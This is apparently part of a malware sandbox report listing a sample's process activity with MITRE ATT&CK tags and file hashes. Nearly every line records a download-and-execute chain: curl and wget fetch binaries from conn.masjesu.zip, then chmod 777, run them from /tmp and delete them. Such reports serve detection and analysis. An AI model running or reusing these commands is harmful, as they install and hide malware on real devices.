  - /usr/bin/curl (PID 951): curl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 953): /bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [System Network Configuration Discovery]
  - /bin/chmod (PID 954): chmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [File and Directory Permissions Modification]
  - /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 (PID 955): ./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [Executes dropped EXE]
  - /bin/rm (PID 956): rm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  - /usr/bin/wget (PID 957): wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  - /usr/bin/curl (PID 958): curl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 960): /bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [System Network Configuration Discovery]
  - /bin/chmod (PID 961): chmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [File and Directory Permissions Modification]
  - /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi (PID 962): ./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [Executes dropped EXE]
  - /bin/rm (PID 963): rm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  - /usr/bin/wget (PID 964): wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [System Network Configuration Discovery]
  - /usr/bin/curl (PID 965): curl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 967): /bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [System Network Configuration Discovery]
  - /bin/chmod (PID 968): chmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [File and Directory Permissions Modification]
  - /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq (PID 969): ./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [Executes dropped EXE]
  - /bin/rm (PID 970): rm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  - /usr/bin/wget (PID 971): wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [System Network Configuration Discovery]
  - /usr/bin/curl (PID 972): curl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 974): /bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [System Network Configuration Discovery]
  - /bin/chmod (PID 975): chmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [File and Directory Permissions Modification]
  - /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls (PID 976): ./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [Executes dropped EXE]
  - /bin/rm (PID 977): rm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  - /usr/bin/wget (PID 978): wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [System Network Configuration Discovery]
  - /usr/bin/curl (PID 979): curl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 981): /bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [System Network Configuration Discovery]
  - /bin/chmod (PID 982): chmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [File and Directory Permissions Modification]
  - /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB (PID 983): ./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [Executes dropped EXE]
  - /bin/rm (PID 984): rm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  - /usr/bin/wget (PID 985): wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [System Network Configuration Discovery]
  - /usr/bin/curl (PID 986): curl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 988): /bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [System Network Configuration Discovery]
  - /bin/chmod (PID 989): chmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [File and Directory Permissions Modification]
  - /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh (PID 990): ./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [Executes dropped EXE]
  - /bin/rm (PID 991): rm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  - /usr/bin/wget (PID 992): wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  - /usr/bin/curl (PID 993): curl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 995): /bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [System Network Configuration Discovery]
  - /bin/chmod (PID 996): chmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [File and Directory Permissions Modification]
  - /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 (PID 997): ./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [Executes dropped EXE]
  - /bin/rm (PID 998): rm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  - /usr/bin/wget (PID 999): wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [System Network Configuration Discovery]
  - /usr/bin/curl (PID 1000): curl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 1002): /bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [System Network Configuration Discovery]
  - /bin/chmod (PID 1003): chmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [File and Directory Permissions Modification]
  - /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi (PID 1004): ./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [Executes dropped EXE]
  - /bin/rm (PID 1005): rm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97